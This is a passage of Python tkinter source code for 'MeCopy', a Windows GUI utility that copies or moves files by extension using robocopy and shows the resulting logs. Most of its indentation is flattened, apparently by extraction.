bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=670, y=393)
E9 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_9).place(x=746, y=397)
btnFind9 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_9).place(x=873, y=396)
Search_10_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=670, y=508)
E10 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_10).place(x=746, y=512)
btnFind10 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_10).place(x=873, y=511)
# MOVE_MODULES_DST_PETITION_END
# MOVE_MODULES_EXTENTIONS_REQUEST
Module_1_Extensions = tk.StringVar()
Ext_Search_1 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=12)
Entry_File_1_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_1_Extensions).place(x=370, y=37)
Module_1_Extensions.set(parser.get("Extensions", "Search_1"))
Module_2_Extensions = tk.StringVar()
Ext_Search_2 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=123)
Entry_File_2_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_2_Extensions).place(x=370, y=150)
Module_2_Extensions.set(parser.get("Extensions", "Search_2"))
Module_3_Extensions = tk.StringVar()
Ext_Search_3 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=241)
Entry_File_3_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_3_Extensions).place(x=370, y=268)
Module_3_Extensions.set(parser.get("Extensions", "Search_3"))
Module_4_Extensions = tk.StringVar()
Ext_Search_4 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=358)
Entry_File_4_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_4_Extensions).place(x=370, y=384)
Module_4_Extensions.set(parser.get("Extensions", "Search_4"))
Module_5_Extensions = tk.StringVar()
Ext_Search_5 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=475)
Entry_File_5_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_5_Extensions).place(x=370, y=500)
Module_5_Extensions.set(parser.get("Extensions", "Search_5"))
Module_6_Extensions = tk.StringVar()
Ext_Search_6 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=12)
Entry_File_6_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_6_Extensions).place(x=960, y=37)
Module_6_Extensions.set(parser.get("Extensions", "Search_6"))
Module_7_Extensions = tk.StringVar()
Ext_Search_7 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=123)
Entry_File_7_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_7_Extensions).place(x=960, y=150)
Module_7_Extensions.set(parser.get("Extensions", "Search_7"))
Module_8_Extensions = tk.StringVar()
Ext_Search_8 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=241)
Entry_File_8_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_8_Extensions).place(x=960, y=268)
Module_8_Extensions.set(parser.get("Extensions", "Search_8"))
Module_9_Extensions = tk.StringVar()
Ext_Search_9 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=358)
Entry_File_9_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_9_Extensions).place(x=960, y=384)
Module_9_Extensions.set(parser.get("Extensions", "Search_9"))
Module_10_Extensions = tk.StringVar()
Ext_Search_10 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=475)
Entry_File_10_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_10_Extensions).place(x=960, y=500)
Module_10_Extensions.set(parser.get("Extensions", "Search_10"))
# MOVE_MODULES_EXTENSIONS_REQUEST_END
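# --- Illustrative sketch (hypothetical helper, not wired into the UI): the
# --- ten Extensions rows above differ only in their config key and (x, y)
# --- position, so they could be built in a loop. The label-to-entry y offset
# --- varies slightly above (+25 to +27 px); a uniform +25 is assumed here:
def Build_Extension_Rows():
    Extension_Vars = []
    for i in range(10):
        x = 380 if i < 5 else 970           # left column vs. right column
        y = (12, 123, 241, 358, 475)[i % 5]
        var = tk.StringVar()
        tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
                 bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=x, y=y)
        EntryEx(Move_Frame, style="EntryStyle.TEntry",
                textvariable=var).place(x=x - 10, y=y + 25)
        var.set(parser.get("Extensions", "Search_" + str(i + 1)))
        Extension_Vars.append(var)
    return Extension_Vars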
# TRANSFERRING_TYPES
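# One Copy/Move radio pair per module; Transfer_Module_N reads RadioValue_N
# (0 = Copy with /COPYALL, 1 = Move with /MOVE) to pick the robocopy mode.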
RadioValue_1 = tk.IntVar()
Copy_Files_Option_1 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_1, value=0).place(x=500, y=35)
Move_Files_Option_1 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_1, value=1).place(x=560, y=35)
RadioValue_2 = tk.IntVar()
Copy_Files_Option_2 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_2, value=0).place(x=500, y=148)
Move_Files_Option_2 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_2, value=1).place(x=560, y=148)
RadioValue_3 = tk.IntVar()
Copy_Files_Option_3 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_3, value=0).place(x=500, y=261)
Move_Files_Option_3 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_3, value=1).place(x=560, y=261)
RadioValue_4 = tk.IntVar()
Copy_Files_Option_4 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_4, value=0).place(x=500, y=374)
Move_Files_Option_4 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_4, value=1).place(x=560, y=374)
RadioValue_5 = tk.IntVar()
Copy_Files_Option_5 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_5, value=0).place(x=500, y=487)
Move_Files_Option_5 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_5, value=1).place(x=560, y=487)
RadioValue_6 = tk.IntVar()
Copy_Files_Option_6 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_6, value=0).place(x=1088, y=35)
Move_Files_Option_6 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_6, value=1).place(x=1148, y=35)
RadioValue_7 = tk.IntVar()
Copy_Files_Option_7 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_7, value=0).place(x=1088, y=148)
Move_Files_Option_7 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_7, value=1).place(x=1148, y=148)
RadioValue_8 = tk.IntVar()
Copy_Files_Option_8 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_8, value=0).place(x=1088, y=261)
Move_Files_Option_8 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_8, value=1).place(x=1148, y=261)
RadioValue_9 = tk.IntVar()
Copy_Files_Option_9 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_9, value=0).place(x=1088, y=374)
Move_Files_Option_9 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_9, value=1).place(x=1148, y=374)
RadioValue_10 = tk.IntVar()
Copy_Files_Option_10 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_10, value=0).place(x=1088, y=487)
Move_Files_Option_10 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_10, value=1).place(x=1148, y=487)
# TRANSFERRING_TYPES_END
# LOGS_GENERATING
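# Each Log_Copy_N / Log_Move_N function below opens the matching robocopy log
# from the logs\ folder in a fixed-size, read-only Toplevel window with a
# vertical scrollbar. (Text height/width are measured in lines/characters, so
# the oversized 800x500 request is simply clipped to the 810x500 window.)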
def Log_Copy_1():
Module_Name = Move_Module_Name_1.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 1] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_1_" + Move_Module_Name_1.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_1():
Module_Name = Move_Module_Name_1.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 1] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_1_" + Move_Module_Name_1.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_2():
Module_Name = Move_Module_Name_2.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 2] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_2_" + Move_Module_Name_2.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_2():
Module_Name = Move_Module_Name_2.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 2] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_2_" + Move_Module_Name_2.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_3():
Module_Name = Move_Module_Name_3.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 3] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_3_" + Move_Module_Name_3.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_3():
Module_Name = Move_Module_Name_3.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 3] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_3_" + Move_Module_Name_3.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_4():
Module_Name = Move_Module_Name_4.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 4] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_4_" + Move_Module_Name_4.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_4():
Module_Name = Move_Module_Name_4.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 4] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_4_" + Move_Module_Name_4.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_5():
Module_Name = Move_Module_Name_5.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 5] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_5_" + Move_Module_Name_5.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_5():
Module_Name = Move_Module_Name_5.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 5] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_5_" + Move_Module_Name_5.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_6():
Module_Name = Move_Module_Name_6.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 6] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_6_" + Move_Module_Name_6.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_6():
Module_Name = Move_Module_Name_6.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 6] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_6_" + Move_Module_Name_6.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_7():
Module_Name = Move_Module_Name_7.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 7] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_7_" + Move_Module_Name_7.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_7():
Module_Name = Move_Module_Name_7.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 7] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_7_" + Move_Module_Name_7.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_8():
Module_Name = Move_Module_Name_8.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 8] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_8_" + Move_Module_Name_8.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_8():
Module_Name = Move_Module_Name_8.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 8] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_8_" + Move_Module_Name_8.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_9():
Module_Name = Move_Module_Name_9.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 9] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_9_" + Move_Module_Name_9.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_9():
Module_Name = Move_Module_Name_9.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 9] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_9_" + Move_Module_Name_9.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_10():
Module_Name = Move_Module_Name_10.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 10] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_10_" + Move_Module_Name_10.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_10():
Module_Name = Move_Module_Name_10.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 10] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_10_" + Move_Module_Name_10.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
# LOGS_GENERATING_END
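# --- Illustrative sketch (hypothetical helper, not wired into the UI): the
# --- twenty Log_Copy_N / Log_Move_N functions above differ only in the module
# --- index, the transfer kind, and the StringVar holding the module name, so
# --- a single factory using this file's existing tkinter imports could
# --- generate them all:
def Make_Log_Viewer(name_var, kind, index):
    def Show_Log():
        Module_Name = name_var.get()
        window_Log = tk.Toplevel(root)
        window_Log.title(Module_Name + " - " + kind +
                         " [Module " + str(index) + "] LOG")
        window_Log.config(bg="#dbdbdb")
        window_Log.geometry("810x500+270+110")
        window_Log.resizable(False, False)
        window_Log.iconbitmap("icon.ico")
        scroll = tk.Scrollbar(window_Log)
        scroll.pack(side=tk.RIGHT, fill=tk.Y)
        with open("logs\\Log_" + kind + "_" + str(index) + "_" + Module_Name + ".txt", "r") as Log_Open:
            Log = tk.Text(window_Log, yscrollcommand=scroll.set)
            Log.pack()
            Log.insert(tk.END, Log_Open.read())
            Log.config(state=tk.DISABLED)
            scroll.config(command=Log.yview)
    return Show_Log
# Usage (hypothetical): Log_Copy_1 = Make_Log_Viewer(Move_Module_Name_1, "Copy", 1)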
# TRANSFER_MODULE
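# Each Transfer_Module_N below saves its row of the UI back to config.ini,
# validates the source/destination, then shells out to Windows robocopy with:
#   /S         copy subdirectories, skipping empty ones
#   /ZB        restartable mode, falling back to backup mode on access errors
#   /XJ        exclude junction points (avoids infinite recursion)
#   /R:0 /W:0  no retries and no wait between retries
#   /TEE       write output to the console as well as the /log file
#   /COPYALL   copy all file info (Copy mode); /MOVE moves files (Move mode)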
def Transfer_Module_1():
parser.set("Paths_Src", "path_1", Src_Path_1.get())
parser.set("Paths_Dst", "path_1", Dst_Path_1.get())
parser.set("Extensions", "Search_1", Module_1_Extensions.get())
parser.set("Path_Names", "path_name_1", Move_Module_Name_1.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_1.get())
Dst = win32api.GetShortPathName(Dst_Path_1.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_1").split(" ")
if parser.get("Paths_Src", "path_1") == parser.get("Paths_Dst", "path_1"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_1")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_1") == ("C:/"):
            Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen C:/ as the source path in (" + parser.get("Path_Names", "path_name_1") +
                                                "). This may cause problems: some files may not be copied, and the operation may take a long time. We recommend choosing a more specific path. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=439, y=82, width=100)
progressbar.start(10)
        Transfer_InProgress = tk.Label(
            Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transferring...")
        Transfer_InProgress.place(x=490, y=60)
if RadioValue_1.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_1_" + Move_Module_Name_1.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_1()
if RadioValue_1.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_1_" + Move_Module_Name_1.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_1()
progressbar.destroy()
        Transfer_InProgress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=340, y=80)
    # FileNotFoundError is a subclass of WindowsError (OSError), so it has to
    # be caught first or its handler is unreachable.
    except FileNotFoundError:
        Path_Error = messagebox.showwarning(
            message="Path cannot be found (" + Src + ")", title="MeCopy")
    except pywintypes.error:
        Path_Error = messagebox.showwarning(message="The source or destination path of "+parser.get(
            "Path_Names", "path_name_1")+" is misspelled or does not exist.", title="MeCopy")
    except (WindowsError, SyntaxError, ValueError, TypeError):
        pass
def Transfer_Module_2():
parser.set("Paths_Src", "path_2", Src_Path_2.get())
parser.set("Paths_Dst", "path_2", Dst_Path_2.get())
parser.set("Extensions", "Search_2", Module_2_Extensions.get())
parser.set("Path_Names", "path_name_2", Move_Module_Name_2.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_2.get())
Dst = win32api.GetShortPathName(Dst_Path_2.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_2").split(" ")
if parser.get("Paths_Src", "path_2") == parser.get("Paths_Dst", "path_2"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_2")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_2") == ("C:/"):
            Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen C:/ as the source path in (" + parser.get("Path_Names", "path_name_2") +
                                                "). This may cause problems: some files may not be copied, and the operation may take a long time. We recommend choosing a more specific path. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=439, y=195, width=100)
progressbar.start(10)
        Transfer_InProgress = tk.Label(
            Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transferring...")
        Transfer_InProgress.place(x=490, y=174)
if RadioValue_2.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_2_" + Move_Module_Name_2.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_2()
if RadioValue_2.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_2_" + Move_Module_Name_2.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_2()
progressbar.destroy()
        Transfer_InProgress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=340, y=193)
    except FileNotFoundError:
        Path_Error = messagebox.showwarning(
            message="Path cannot be found (" + Src + ")", title="MeCopy")
    except pywintypes.error:
        Path_Error = messagebox.showwarning(message="The source or destination path of "+parser.get(
            "Path_Names", "path_name_2")+" is misspelled or does not exist.", title="MeCopy")
    except (WindowsError, SyntaxError, ValueError, TypeError):
        pass
def Transfer_Module_3():
parser.set("Paths_Src", "path_3", Src_Path_3.get())
parser.set("Paths_Dst", "path_3", Dst_Path_3.get())
parser.set("Extensions", "Search_3", Module_3_Extensions.get())
parser.set("Path_Names", "path_name_3", Move_Module_Name_3.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_3.get())
